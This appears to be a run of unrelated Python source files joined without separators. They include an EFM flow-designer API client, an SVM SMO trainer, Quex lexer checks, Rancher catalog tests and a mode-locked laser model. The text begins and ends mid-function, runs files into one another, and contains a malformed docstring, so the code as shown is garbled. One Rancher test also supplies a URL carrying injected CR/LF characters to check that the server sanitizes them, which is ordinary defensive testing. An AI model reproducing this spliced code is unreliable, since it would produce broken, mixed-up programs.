new_black_elo = calculate_elo(black_elo, white_elo, 0.5) return new_white_elo, new_black_elo rch/edge2ai-workshopsetup/terraform/resources/labs/utils/efm.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- import re from . import * _AGENT_MANIFESTS = None def _get_api_url(): return '%s://%s:10088/efm/api' % ('http', get_hostname(),) def _api_request(method, endpoint, expected_code=requests.codes.ok, **kwargs): url = _get_api_url() + endpoint return api_request(method, url, expected_code, **kwargs) def _api_get(endpoint, expected_code=requests.codes.ok, **kwargs): return _api_request('GET', endpoint, expected_code, **kwargs) def _api_post(endpoint, expected_code=requests.codes.ok, **kwargs): return _api_request('POST', endpoint, expected_code, **kwargs) def _api_delete(endpoint, expected_code=requests.codes.ok, **kwargs): return _api_request('DELETE', endpoint, expected_code, **kwargs) def _get_client_id(): resp = _api_get('/designer/client-id') return resp.text def _get_agent_manifests(): global _AGENT_MANIFESTS if not _AGENT_MANIFESTS: resp = _api_get('/agent-manifests') _AGENT_MANIFESTS = resp.json() return _AGENT_MANIFESTS def get_flow(agent_class): resp = _api_get('/designer/flows') json = resp.json() assert ('elements' in json) assert (len(json['elements']) == 1) flow = json['elements'][0] return flow['identifier'], flow['rootProcessGroupIdentifier'] def _get_processor_bundle(processor_type): for manifest in _get_agent_manifests(): for bundle in manifest['bundles']: for processor in bundle['componentManifest']['processors']: if processor['type'] == processor_type: return { 'group': processor['group'], 'artifact': processor['artifact'], 'version': processor['version'], } raise RuntimeError('Processor type %s not found in agent manifest.' % (processor_type,)) def create_processor(flow_id, pg_id, name, processor_type, position, properties, auto_terminate=None): endpoint = '/designer/flows/{flowId}/process-groups/{pgId}/processors'.format(flowId=flow_id, pgId=pg_id) body = { 'revision': { 'clientId': _get_client_id(), 'version': 0 }, 'componentConfiguration': { 'name': name, 'type': processor_type, 'bundle': _get_processor_bundle(processor_type), 'position': { 'x': position[0], 'y': position[1] }, 'properties': properties, 'autoTerminatedRelationships': auto_terminate, } } resp = _api_post(endpoint, requests.codes.created, headers={'Content-Type': 'application/json'}, json=body) return resp.json()['componentConfiguration']['identifier'] def create_remote_processor_group(flow_id, pg_id, name, rpg_url, transport_protocol, position): endpoint = '/designer/flows/{flowId}/process-groups/{pgId}/remote-process-groups'.format(flowId=flow_id, pgId=pg_id) body = { 'revision': { 'clientId': _get_client_id(), 'version': 0 }, 'componentConfiguration': { 'name': name, 'position': { 'x': position[0], 'y': position[1] }, 'transportProtocol': transport_protocol, 'targetUri': rpg_url, 'targetUris': rpg_url, } } resp = _api_post(endpoint, requests.codes.created, headers={'Content-Type': 'application/json'}, json=body) return resp.json()['componentConfiguration']['identifier'] def _get_all_by_type(flow_id, obj_type): endpoint = '/designer/flows/{flowId}'.format(flowId=flow_id) resp = _api_get(endpoint, headers={'Content-Type': 'application/json'}) obj_type_alt = re.sub(r'[A-Z]', lambda x: '-' + x.group(0).lower(), obj_type) for obj in resp.json()['flowContent'][obj_type]: endpoint = '/designer/flows/{flowId}/{objType}/{objId}'.format(flowId=flow_id, objType=obj_type_alt, objId=obj['identifier']) resp = _api_get(endpoint, headers={'Content-Type': 'application/json'}) yield resp.json() def delete_by_type(flow_id, obj, obj_type): obj_id = obj['componentConfiguration']['identifier'] version = obj['revision']['version'] client_id = _get_client_id() obj_type_alt = re.sub(r'[A-Z]', lambda x: '-' + x.group(0).lower(), obj_type) endpoint = '/designer/flows/{flowId}/{objType}/{objId}?version={version}&clientId={clientId}'.format( flowId=flow_id, objType=obj_type_alt, objId=obj_id, version=version, clientId=client_id) _api_delete(endpoint, headers={'Content-Type': 'application/json'}) LOG.debug('Object of type %s (%s) deleted.', obj_type, obj_id) def delete_all(flow_id): for obj_type in ['connections', 'remoteProcessGroups', 'processors', 'inputPorts', 'outputPorts']: for conn in _get_all_by_type(flow_id, obj_type): delete_by_type(flow_id, conn, obj_type) def create_connection(flow_id, pg_id, source_id, source_type, destination_id, destination_type, relationships, source_port=None, destination_port=None, name=None, flow_file_expiration=None): def _get_endpoint(endpoint_id, endpoint_type, endpoint_port): if endpoint_type == 'PROCESSOR': return {'id': endpoint_id, 'type': 'PROCESSOR'} elif endpoint_type == 'REMOTE_INPUT_PORT': return {'groupId': endpoint_id, 'type': 'REMOTE_INPUT_PORT', 'id': endpoint_port} else: raise RuntimeError('Endpoint type %s is not supported' % (endpoint_type,)) endpoint = '/designer/flows/{flowId}/process-groups/{pgId}/connections'.format(flowId=flow_id, pgId=pg_id) body = { 'revision': { 'clientId': _get_client_id(), 'version': 0 }, 'componentConfiguration': { 'source': _get_endpoint(source_id, source_type, source_port), 'destination': _get_endpoint(destination_id, destination_type, destination_port), 'selectedRelationships': relationships, 'name': name, 'flowFileExpiration': flow_file_expiration, 'backPressureObjectThreshold': None, 'backPressureDataSizeThreshold': None, } } resp = _api_post(endpoint, requests.codes.created, headers={'Content-Type': 'application/json'}, json=body) return resp.json() def publish_flow(flow_id, comments): endpoint = '/designer/flows/{flowId}/publish'.format(flowId=flow_id) body = { 'comments': comments, } _api_post(endpoint, headers={'Content-Type': 'application/json'}, json=body) 0 import random from kernels import Kernel, calc_kernel, calculate_kernels class SVMModel(object): def __init__(self, n, c, xs, ys, kernel: Kernel, param): self.alphas = [0] * n self.b = 0 self.c = c self.xs = xs self.ks = calculate_kernels(xs, kernel, param) self.ys = ys self.kernel = kernel self.param = param def predict(self, x): assert (len(self.xs[0]) == len(x)) assert (len(self.xs) == len(self.alphas)) res = 0 for alpha, x_i, y_i in zip(self.alphas, self.xs, self.ys): res += alpha * y_i * calc_kernel(x_i, x, self.kernel, self.param) res += self.b if res > 0: return 1 else: return -1 def f(model: SVMModel, ks, ys, i: int): n = len(ys) f_val = 0 for j in range(n): f_val += model.alphas[j] * ks[i][j] * ys[j] f_val += model.b return f_val def L_and_H(model: SVMModel, ys, i: int, j: int): if ys[i] != ys[j]: return max(0, model.alphas[j] - model.alphas[i]), min(model.c, model.c + model.alphas[j] - model.alphas[i]) else: return max(0, model.alphas[j] + model.alphas[i] - model.c), min(model.c, model.alphas[j] + model.alphas[i]) def update_alpha(alpha_j, e_i, e_j, y_j: int, nu: float, ll: float, h: float): new_alpha = alpha_j - y_j * (e_i - e_j) / nu return put_alpha_in_range(new_alpha, ll, h) def put_alpha_in_range(alpha_j, ll, h): if alpha_j > h: return h if h >= alpha_j >= ll: return alpha_j else: return ll def simplified_SMO(xs, ys, c, kernel, param): eps = 1e-6 tolerance = 1e-6 n = len(ys) max_passes = 55000 passes = 0 cur_model = SVMModel(n, c, xs, ys, kernel, param) # Check all sizes assert (len(cur_model.ks) == len(ys)) assert (len(xs) == len(ys)) while passes < max_passes: others = list(range(n)) random.shuffle(others) for i in range(n): passes += 1 if passes > max_passes: break e_i = f(cur_model, cur_model.ks, ys, i) - ys[i] if (ys[i] * e_i < -tolerance and cur_model.alphas[i] < cur_model.c) or ( ys[i] * e_i > tolerance and cur_model.alphas[i] > 0): j = others[i] if j == i: continue prev_alpha_i = cur_model.alphas[i] prev_alpha_j = cur_model.alphas[j] e_j = f(cur_model, cur_model.ks, ys, j) - ys[j] ll, h = L_and_H(cur_model, ys, i, j) if ll == h: continue nu = 2 * cur_model.ks[i][j] - cur_model.ks[i][i] - cur_model.ks[j][j] if nu >= 0 or abs(nu) < 1e-7: continue try: new_alpha_j = update_alpha(prev_alpha_j, e_i, e_j, ys[j], nu, ll, h) except ZeroDivisionError: continue cur_model.alphas[j] = new_alpha_j if abs(new_alpha_j - prev_alpha_j) < eps: continue new_alpha_i = prev_alpha_i + ys[i] * ys[j] * (prev_alpha_j - new_alpha_j) cur_model.alphas[i] = new_alpha_i b1 = cur_model.b - e_i - ys[i] * (new_alpha_i - prev_alpha_i) * cur_model.ks[i][i] - ys[j] * ( new_alpha_j - prev_alpha_j) * cur_model.ks[i][j] b2 = cur_model.b - e_j - ys[i] * (new_alpha_i - prev_alpha_i) * cur_model.ks[i][j] - ys[j] * ( new_alpha_j - prev_alpha_j) * cur_model.ks[j][j] cur_model.b = (b1 + b2) / 2 if 0 < new_alpha_i < cur_model.c: cur_model.b = b1 if 0 < new_alpha_j < cur_model.c: cur_model.b = b2 return cur_model class ReportGenerator(object): u""" Top-level class that needs to be subclassed to provide a report generator. """ filename_template = 'report-%s-to-%s.csv' mimetype = 'text/csv' code = '' description = '' def __init__(self, **kwargs): if 'start_date' in kwargs and 'end_date' in kwargs: self.start_date = kwargs['start_date'] self.end_date = kwargs['end_date'] def generate(self, response): pass def filename(self): u""" Returns the filename for this report """ return self.filename_template % (self.start_date, self.end_date) def is_available_to(self, user): u""" Checks whether this report is available to this user """ return user.is_staff# Project Quex (http://quex.sourceforge.net); License: MIT; # (C) 2005-2020 ; #_______________________________________________________________________________ from quex.input.files.specifier.mode import Mode_Prep, ModeParsed from quex.input.setup import NotificationDB import quex.engine.state_machine.check.superset as superset_check import quex.engine.state_machine.algebra.is_disjoint as is_disjoint import quex.engine.state_machine.check.outrun as outrun_checker import quex.engine.misc.error as error from quex.engine.misc.tools import typed import quex.blackboard as blackboard from quex.blackboard import setup as Setup import quex.token_db as token_db from quex.constants import E_IncidenceIDs @typed(ModePrepList=[Mode_Prep]) def do(ModePrepList): """Consistency check of mode database -- Are there applicable modes? -- Start mode: -- specified (more than one applicable mode req. explicit specification)? -- is defined as mode? -- start mode is not inheritable only? -- Entry/Exit transitions are allows? """ assert not Setup.token_class_only_f assert ModePrepList mode_name_list = sorted([m.name for m in ModePrepList]) # (*) If a conversion or a codec engine is specified, then the # 'on_bad_lexatom' handler must be specified in every mode. if Setup.buffer_encoding.bad_lexatom_possible(): _check_on_bad_lexatom_handler_implemented(ModePrepList) # (*) on_n_dedent for mode in ModePrepList: _check_token_repetition_enabled(mode, token_db) # (*) Entry/Exit Transitions for mode in ModePrepList: if not mode.implemented_f(): continue __entry_transitions(mode, ModePrepList, mode_name_list) __exit_transitions(mode, ModePrepList, mode_name_list) for mode in ModePrepList: # (*) [Optional] Warnings on Outrun if Setup.warning_on_outrun_f: _check_low_priority_outruns_high_priority_pattern(mode) # (*) Special Patterns shall not match on same lexemes if NotificationDB.error_on_special_pattern_same not in Setup.suppressed_notification_list: _check_match_same(mode, NotificationDB.error_on_special_pattern_same) # (*) Special Patterns (skip, indentation, etc.) # shall not be outrun by another pattern. if NotificationDB.error_on_special_pattern_outrun not in Setup.suppressed_notification_list: _check_special_incidence_outrun(mode, NotificationDB.error_on_special_pattern_outrun) # (*) Special Patterns shall not have common matches with patterns # of higher precedence. if NotificationDB.error_on_special_pattern_subset not in Setup.suppressed_notification_list: _check_higher_priority_matches_subset(mode, NotificationDB.error_on_special_pattern_subset) # (*) Check for dominated patterns if NotificationDB.error_on_dominated_pattern not in Setup.suppressed_notification_list: _check_dominated_pattern(mode, NotificationDB.error_on_dominated_pattern) def _check_special_incidence_outrun(mode, ErrorCode): for high, low in mode.unique_pattern_pair_iterable(): if high.pattern_string() not in Mode_Prep.focus \ and low.pattern_string() not in Mode_Prep.focus: continue elif not outrun_checker.do(high.sm, low.sm): continue error.log_consistency_issue(high, low, ExitF=False, ThisComment = "has higher precedence but", ThatComment = "may outrun it", SuppressCode = ErrorCode) def _check_higher_priority_matches_subset(mode, ErrorCode): """Checks whether a higher prioritized pattern matches a common subset of the ReferenceSM. For special patterns of skipper, etc. this would be highly confusing. """ global special_pattern_list for high, low in mode.unique_pattern_pair_iterable(): if high.pattern_string() not in Mode_Prep.focus \ and low.pattern_string() not in Mode_Prep.focus: continue if not superset_check.do(high.sm, low.sm): continue error.log_consistency_issue(high, low, ExitF=True, ThisComment = "has higher precedence and", ThatComment = "matches a subset of", SuppressCode = ErrorCode) def _check_dominated_pattern(mode, ErrorCode): for high, low in mode.unique_pattern_pair_iterable(): # 'low' comes after 'high' => 'i' has precedence # Check for domination. if superset_check.do(high, low): error.log_consistency_issue(high, low, ThisComment = "matches a superset of what is matched by", EndComment = "The former has precedence and the latter can never match.", ExitF = True, SuppressCode = ErrorCode) def _check_match_same(mode, ErrorCode): """Special patterns shall never match on some common lexemes.""" for high, low in mode.unique_pattern_pair_iterable(): if high.pattern_string() not in Mode_Prep.focus \ and low.pattern_string() not in Mode_Prep.focus: continue # A superset of B, or B superset of A => there are common matches. if is_disjoint.do(high.sm, low.sm): continue # The 'match what remains' is exempted from check. if high.pattern_string() == "." or low.pattern_string() == ".": continue error.log_consistency_issue(high, low, ThisComment = "matches on some common lexemes as", ThatComment = "", ExitF = True, SuppressCode = ErrorCode) def _check_low_priority_outruns_high_priority_pattern(mode): """Warn when low priority patterns may outrun high priority patterns. Assume that the pattern list is sorted by priority! """ for high, low in mode.unique_pattern_pair_iterable(): if outrun_checker.do(high.sm, low.sm): error.log_consistency_issue(low, high, ExitF=False, ThisComment="may outrun") def initial_mode(ModePrepList, initial_mode): # (*) Start mode specified? mode_name_list, \ implemented_mode_name_list = _get_mode_name_lists(ModePrepList) """If more then one mode is defined, then that requires an explicit definition 'start = mode'. """ assert implemented_mode_name_list assert blackboard.initial_mode is not None mode = initial_mode.get_text() # Start mode present and applicable? error.verify_word_in_list(mode, mode_name_list, "Start mode '%s' is not defined." % mode, blackboard.initial_mode.sr) error.verify_word_in_list(mode, implemented_mode_name_list, "Start mode '%s' is inheritable only and cannot be instantiated." % mode, initial_mode.sr) def __access_mode(Mode, ModePrepList, OtherModeName, ModeNameList, EntryF): type_str = { True: "entry from", False: "exit to" }[EntryF] error.verify_word_in_list(OtherModeName, ModeNameList, "Mode '%s' permits the %s mode '%s'\nbut no such mode exists." % \ (Mode.name, type_str, OtherModeName), Mode.sr) for mode in ModePrepList: if mode.name == OtherModeName: return mode # OtherModeName MUST be in ModePrepList, at this point in time. assert False def __error_transition(Mode, OtherMode, EntryF): type_str = { True: "entry", False: "exit" }[EntryF] type0_str = { True: "entry from", False: "exit to" }[EntryF] type1_str = { True: "exit to", False: "entry from" }[EntryF] error.log("Mode '%s' permits the %s mode '%s' but mode '%s' does not" % (Mode.name, type0_str, OtherMode.name, OtherMode.name), Mode.sr, DontExitF=True) error.log("permit the %s mode '%s' or any of its base modes." % (type1_str, Mode.name), OtherMode.sr, DontExitF=True) error.log("May be, use explicitly mode tag '<%s: ...>' for restriction." % type_str, Mode.sr) def __exit_transitions(mode, ModePrepList, mode_name_list): for exit_mode_name in mode.exit_mode_name_list: exit_mode = __access_mode(mode, ModePrepList, exit_mode_name, mode_name_list, EntryF=False) # Check if this mode or one of the base modes can enter for base_mode in mode.base_mode_sequence: if base_mode.name in exit_mode.entry_mode_name_list: break else: __error_transition(mode, exit_mode, EntryF=False) def __entry_transitions(mode, ModePrepList, mode_name_list): for entry_mode_name in mode.entry_mode_name_list: entry_mode = __access_mode(mode, ModePrepList, entry_mode_name, mode_name_list, EntryF=True) # Check if this mode or one of the base modes can be reached for base_mode in mode.base_mode_sequence: if base_mode.name in entry_mode.exit_mode_name_list: break else: __error_transition(mode, entry_mode, EntryF=True) def _check_on_bad_lexatom_handler_implemented(ModePrepList): bad_mode_name_list = [ mode.name for mode in ModePrepList if E_IncidenceIDs.BAD_LEXATOM not in mode.incidence_db ] if not bad_mode_name_list: return lexatom_range = Setup.lexatom.type_range modes_str = ", ".join(name for name in bad_mode_name_list) mode = ModePrepList[0] error.warning("Missing 'on_bad_lexatom' handler in mode(s) %s.\n" \ % modes_str + \ "The range of values in buffer elements is [%i:%i].\n" \ % (lexatom_range.begin, lexatom_range.end-1) + \ "Not all of those contain representations in the buffer's encoding '%s'." % Setup.buffer_encoding.name, mode.sr, SuppressCode=NotificationDB.warning_codec_error_with_non_unicode) def _check_token_repetition_enabled(mode, token_db): if mode.loopers.indentation_handler: if not token_db.support_repetition(): error.warning("Option 'indentation' defined token repetition is not supported.\n" \ "May be: * Define 'token { DEDENT \\repeatable; }'.\n" " * And, if token type is customized, define 'repetition_n = member-name'.", mode.sr) elif "DEDENT" not in token_db.token_repetition_token_id_list: error.warning("Option 'indentation' defined, but 'DEDENT' is not marked as repeatable.\n" \ "Define 'token { DEDENT \\repeatable; }'.\n", mode.sr) def _get_mode_name_lists(ModePrepList): mode_name_list = sorted([mode.name for mode in ModePrepList]) # Applicable modes can only be determined after possible addition of "inheritable: only" implemented_mode_name_list = sorted([mode.name for mode in ModePrepList if mode.option_db.value("inheritable") != "only"]) return mode_name_list, implemented_mode_name_list import pytest import time from rancher import ApiError from .common import wait_for_template_to_be_created, \ wait_for_template_to_be_deleted, random_str from .conftest import set_server_version def test_catalog(admin_mc): client = admin_mc.client name1 = random_str() name2 = random_str() url = "https://github.com/StrongMonkey/charts-1.git" catalog1 = client.create_catalog(name=name1, branch="test", url=url, ) catalog2 = client.create_catalog(name=name2, branch="test", url=url, ) wait_for_template_to_be_created(client, name1) wait_for_template_to_be_created(client, name2) client.delete(catalog1) client.delete(catalog2) wait_for_template_to_be_deleted(client, name1) wait_for_template_to_be_deleted(client, name2) def test_invalid_catalog(admin_mc, remove_resource): client = admin_mc.client name = random_str() bad_url = "git://github.com/StrongMonkey/charts-1.git" # POST: Bad URL with pytest.raises(ApiError) as e: catalog = client.create_catalog(name=name, branch="test", url=bad_url, ) remove_resource(catalog) assert e.value.error.status == 422 # POST: No URL with pytest.raises(ApiError) as e: catalog = client.create_catalog(name=name, branch="test", url="", ) remove_resource(catalog) assert e.value.error.status == 422 # PUT: Bad URL good_url = "https://github.com/StrongMonkey/charts-1.git" catalog = client.create_catalog(name=name, branch="test", url=good_url, ) remove_resource(catalog) wait_for_template_to_be_created(client, name) with pytest.raises(ApiError) as e: catalog.url = bad_url client.update_by_id_catalog(catalog.id, catalog) assert e.value.error.status == 422 def test_invalid_catalog_chars(admin_mc, remove_resource): client = admin_mc.client name = random_str() url = "https://github.com/%0dStrongMonkey%0A/charts-1.git" catalog = client.create_catalog(name=name, branch="test", url=url, ) remove_resource(catalog) wait_for_template_to_be_created(client, name) catalog = client.reload(catalog) correct_url = "https://github.com/StrongMonkey/charts-1.git" assert catalog['url'] == correct_url def test_global_catalog_template_access(admin_mc, user_factory, remove_resource): client = admin_mc.client user1 = user_factory() remove_resource(user1) name = random_str() # Get all templates from library catalog that is enabled by default updated = False start = time.time() interval = 0.5 while not updated: time.sleep(interval) interval *= 2 c = client.list_catalog(name="library").data[0] if c.transitioning == "no": updated = True continue if time.time() - start > 90: raise AssertionError( "Timed out waiting for catalog to stop transitioning") existing = client.list_template(catalogId="library").data templates = [] for t in existing: templates.append("library-"+t.name) url = "https://github.com/mrajashree/charts.git" catalog = client.create_catalog(name=name, branch="onlyOne", url=url, ) wait_for_template_to_be_created(client, name) updated = False start = time.time() interval = 0.5 while not updated: time.sleep(interval) interval *= 2 c = client.list_catalog(name=name).data[0] if c.transitioning == "no": updated = True continue if time.time() - start > 90: raise AssertionError( "Timed out waiting for catalog to stop transitioning") # Now list all templates of this catalog new_templates = client.list_template(catalogId=name).data for t in new_templates: templates.append(name+"-"+t.name) all_templates = existing + new_templates # User should be able to list all these templates user_client = user1.client user_lib_templates = user_client.list_template(catalogId="library").data user_new_templates = user_client.list_template(catalogId=name).data user_templates = user_lib_templates + user_new_templates assert len(user_templates) == len(all_templates) client.delete(catalog) wait_for_template_to_be_deleted(client, name) def test_user_can_list_global_catalog(user_factory, remove_resource): user1 = user_factory() remove_resource(user1) user_client = user1.client c = user_client.list_catalog(name="library") assert len(c) == 1 @pytest.mark.nonparallel def test_template_version_links(admin_mc, admin_pc, custom_catalog, remove_resource, restore_rancher_version): """Test that template versionLinks are being updated based off the rancher version set on the server and the query paramater 'rancherVersion' being set. """ # 1.6.0 uses 2.0.0-2.2.0 # 1.6.2 uses 2.1.0-2.3.0 client = admin_mc.client c_name = random_str() custom_catalog(name=c_name) # Set the server expecting both versions set_server_version(client, "2.1.0") templates = client.list_template( rancherVersion='2.1.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 2 assert '1.6.0' in templates.data[0]['versionLinks'] assert '1.6.2' in templates.data[0]['versionLinks'] # Set the server expecting only the older version set_server_version(client, "2.0.0") templates = client.list_template( rancherVersion='2.0.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 1 assert '1.6.0' in templates.data[0]['versionLinks'] # Set the server expecting only the newer version set_server_version(client, "2.3.0") templates = client.list_template( rancherVersion='2.3.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 1 assert '1.6.2' in templates.data[0]['versionLinks'] # Set the server expecting no versions, this should be outside both # versions acceptable ranges set_server_version(client, "2.4.0") templates = client.list_template( rancherVersion='2.4.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 0 # If no rancher version is set get back both versions templates = client.list_template(catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 2 assert '1.6.0' in templates.data[0]['versionLinks'] assert '1.6.2' in templates.data[0]['versionLinks'] demos/demo_trifinger_platform_log.py #!/usr/bin/env python3 """Demo showing how to use TriFingerPlatformLog.""" import argparse import cv2 import robot_fingers import trifinger_cameras # noqa -- needed for camera observation from trifinger_cameras import utils def main(): parser = argparse.ArgumentParser() parser.add_argument("robot_log", type=str, help="Robot log file") parser.add_argument("camera_log", type=str, help="Camera log file") args = parser.parse_args() log = robot_fingers.TriFingerPlatformLog(args.robot_log, args.camera_log) # iterate over all robot time steps in the log for t in range(log.get_first_timeindex(), log.get_last_timeindex() + 1): # TriFingerPlatformLog provides the same getters as # TriFingerPlatformFrontend: robot_observation = log.get_robot_observation(t) # print position of the first finger print(robot_observation.position[:3]) # show images of camera180 try: camera_observation = log.get_camera_observation(t) cv2.imshow( "camera180", utils.convert_image(camera_observation.cameras[1].image), ) cv2.waitKey(1) except Exception as e: print(e) if __name__ == "__main__": main() LaudateCorpus1/caladriustraffic_provider/predicted_traffic.py import datetime as dt import logging import pandas as pd from typing import Any, Dict from caladrius.traffic_provider.trafficprovider import TrafficProvider from caladrius.graph.gremlin.client import GremlinClient from caladrius.metrics.heron.client import HeronMetricsClient from caladrius.model.traffic.heron.base import HeronTrafficModel from caladrius.model.traffic.heron.prophet import ProphetTrafficModel from model.topology.heron.helpers import convert_throughput_to_inter_arr_times LOG: logging.Logger = logging.getLogger(__name__) class PredictedTraffic(TrafficProvider): """ This module takes in user-provided information and uses it to create a HeronTraffic Model that can be used to predict and supply arrival rate information about traffic in future. """ def __init__(self, metrics_client: HeronMetricsClient, graph_client: GremlinClient, topology_id: str, cluster: str, environ: str, start: [dt.datetime], end: [dt.datetime], traffic_config: Dict[str, Any], **other_kwargs) -> None: self.topology_id = topology_id self.cluster = cluster self.environ = environ self.start = start self.end = end self.kwargs = other_kwargs self.graph_client: GremlinClient = graph_client self.metrics_client: HeronMetricsClient = metrics_client self.arrival_rate = None self.inter_arrival_time = None self.tuple_arrival = None model: HeronTrafficModel = ProphetTrafficModel(traffic_config, self.metrics_client, self.graph_client) # this data structure contains data received per instance per second self.prediction_results = model.predict_traffic(topology_id, cluster, environ, **other_kwargs) def tuple_arrivals(self): """This function returns the number of tuples arrived at an instance in a minute""" # Note that these are tuple arrival values for future cases and predictions themselves. # we shouldn't use them to validate queue sizes. if self.arrival_rate is None: self.arrival_rates() self.tuple_arrival = self.arrival_rate.copy() # the following converts the data back to tuple arrivals per minute self.tuple_arrival['num-tuples'] = self.arrival_rate['mean_arrival_rate'] * 60 * 1000 self.tuple_arrival.drop(["mean_arrival_rate"], axis=1) return self.tuple_arrival def arrival_rates(self) -> pd.DataFrame: """This function returns the number of tuples arrived at an instance per ms""" df: pd.DataFrame = pd.DataFrame(columns=['task', 'mean_arrival_rate']) # this function returns arrival rates as number of tuples that arrive per millisecond # as prediction_results data is in seconds, we need to divide to get data for millseconds # format --> task mean_arrival_rate mean_rates = self.prediction_results["instances"]["mean"] for task, rates in mean_rates.items(): data_across_streams = 0 for _, value in rates.items(): data_across_streams = data_across_streams + value df = df.append({'task': task, 'mean_arrival_rate': data_across_streams / 1000}, ignore_index=True) self.arrival_rate = df return df def inter_arrival_times(self): """This function returns the time between the arrival of two subsequent tuples in ms""" # this function returns arrival times between two subsequent tuples in ms # task mean_inter_arrival_time std_inter_arrival_time if self.inter_arrival_time is None: if self.tuple_arrival is None: self.tuple_arrivals() self.inter_arrival_time = convert_throughput_to_inter_arr_times(self.tuple_arrival) return self.inter_arrival_time def service_times(self): """TODO: Also predict service times for all components!""" bolt_service_times = self.metrics_client.get_service_times(self.topology_id, self.cluster, self.environ, self.start, self.end, **self.kwargs) # Drop the system streams if bolt_service_times.empty: raise Exception("Service times for the topology's bolts are unavailable") bolt_service_times.drop(["component", "stream"], axis=1, inplace=True) return bolt_service_times # Copyright 2011 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. class MethodConcept(object): from com.sun.star.beans.MethodConcept import ALL, PROPERTY class PropertyConcept(object): from com.sun.star.beans.PropertyConcept import ALL, PROPERTYSET, ATTRIBUTES, METHODS class FieldAccessMode(object): from com.sun.star.reflection.FieldAccessMode import READWRITE, READONLY, WRITEONLY modes = {READONLY.value: '[Read Only]', #READWRITE.value: '[ReadWrite]', READWRITE.value: '', WRITEONLY.value: '[WriteOnly]'} class ParamMode(object): from com.sun.star.reflection.ParamMode import IN, OUT, INOUT modes = {IN.value: '[in]', OUT.value: '[out]', INOUT.value: '[inout]'} class PropertyAttribute(object): from com.sun.star.beans.PropertyAttribute import \ MAYBEVOID, BOUND, CONSTRAINED, TRANSIENT, READONLY, \ MAYBEAMBIGUOUS, MAYBEDEFAULT, REMOVEABLE, OPTIONAL modes = {MAYBEVOID: 'Maybevoid', BOUND: 'Bound', CONSTRAINED: 'Constrained', TRANSIENT: 'Transient', READONLY: 'Read_Only', MAYBEAMBIGUOUS: 'Maybeambiguous', MAYBEDEFAULT: 'Maybedefault', REMOVEABLE: 'Removeable', OPTIONAL: 'Optional'} class TypeClass(object): from com.sun.star.uno.TypeClass import \ SEQUENCE, ARRAY, VOID, BYTE, SHORT, UNSIGNED_SHORT, \ LONG, UNSIGNED_LONG, HYPER, UNSIGNED_HYPER, FLOAT, \ DOUBLE, BOOLEAN, CHAR, STRING, STRUCT, INTERFACE, \ TYPE, ANY, ENUM, EXCEPTION class TypeClassGroups(object): INT = [TypeClass.SHORT, TypeClass.UNSIGNED_SHORT, TypeClass.LONG, TypeClass.UNSIGNED_LONG, TypeClass.HYPER, TypeClass.UNSIGNED_HYPER] FLOATING = [TypeClass.FLOAT, TypeClass.DOUBLE] NUMERIC = INT + FLOATING STR = TypeClass.STRING SEQ = [TypeClass.SEQUENCE, TypeClass.ARRAY] OBJECT = TypeClass.INTERFACE STRUCTS = (TypeClass.STRUCT, TypeClass.EXCEPTION) COMPATIBLE = NUMERIC + [ TypeClass.STRING, TypeClass.BOOLEAN, TypeClass.ENUM, TypeClass.INTERFACE, TypeClass.STRUCT, TypeClass.TYPE] ALL = {getattr(TypeClass, k).value: getattr(TypeClass, k) for k in dir(TypeClass) if hasattr(getattr(TypeClass, k), 'value')} @classmethod def get_type_class(cls, type_name): return cls.ALL.get(type_name.upper(), None) """ Downloding Google Forms Data. Collect a list of email address from a Google spreadsheet. """" import ezsheets ss = ezsheets.Spreadsheet('SPREADSHEET') # use your Google form spreadsheet # ID here # Get the google spreadsheet, and rows sheet = ss[0] rows = sheet.getRows() print(rows) # Get the 3rd column, that contains the emils columnThree = sheet.getColumn(3) print(columnThree) # if the cell is empty, or it says "Email" meaning it is the title column, # skip to the next cell in the column, else, print the email for i in columnThree: if i == '' or i == 'Email': continue else: print(i) 0 #!/usr/bin/python -tt def Mul3or5(max): ''' Mul3or5 - If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23. Find the sum of all the multiples of 3 or 5 below 1000. ''' sum = 0 for i in range(1, max): if (i % 3 == 0) or (i % 5 == 0): sum += i return 'sum of all the multiples of 3 or 5 below ' + str(max) + ' is ' + str(sum) if __name__ == '__main__': print('Problem 0001: ' + Mul3or5(1000)) import sys from os.path import join, abspath, dirname, isdir, isfile sys.path.append(join('..')) sys.path.append(join('..', 'lisdf')) sys.path.append(join('..', 'pddlstream')) sys.path.append(join('..', 'pybullet_planning')) import warnings warnings.filterwarnings('ignore') ASSET_PATH = join(dirname(__file__), '..', 'assets') EXP_PATH = join(dirname(__file__), '..', 'test_cases')# -*- coding: utf-8 -*- """ Model of a passively mode-locked laser. @author: """ # ignore warning 'line break after binary operator' # as line break *before* binary operator *also* creates a warning ... # flake8: noqa: W504 import numpy as np from scipy.optimize import brentq from ..root import CT_LTI_System, CT_System class Laser(CT_System): """A class to simulate lasers with a (slow) saturable absorber in the cavity. While it is intended for mode-locked lasers, it may also be useful for Q-switched lasers.""" def __init__(self, loss, TR, tauL, etaP, EsatL, DR, EsatA, Toc, PP0=0., P0=None, g0=None): self.loss = loss self.TR = TR self.tauL = tauL self.etaP = etaP self.EsatL = EsatL self.DR = DR self.EsatA = EsatA self.Toc = Toc # self.PP0 = PP0 # self.PP = PP0 if P0 is None: P0 = self.Psteady(PP0) if g0 is None: g0 = self.gsteady(PP0) self.g0 = g0 super().__init__(self.f, self.g, 2, (1, 1), s0=np.matrix([[P0], [g0]])) def qP(self, EP): S = EP / self.EsatA res = np.where(S == 0, self.DR, self.DR / S * (1. - np.exp(-S))) if res.shape == (1,): res = res[0] return(res) def dqP_dEP(self, EP): EsatA = self.EsatA S = EP / EsatA if S == 0: return(self.DR / self.EsatA) else: return(self.DR / EP * (np.exp(-S) - 1. / S + np.exp(-S) / S)) def Pdot(self, P, g): P = np.array(P) g = np.array(g) 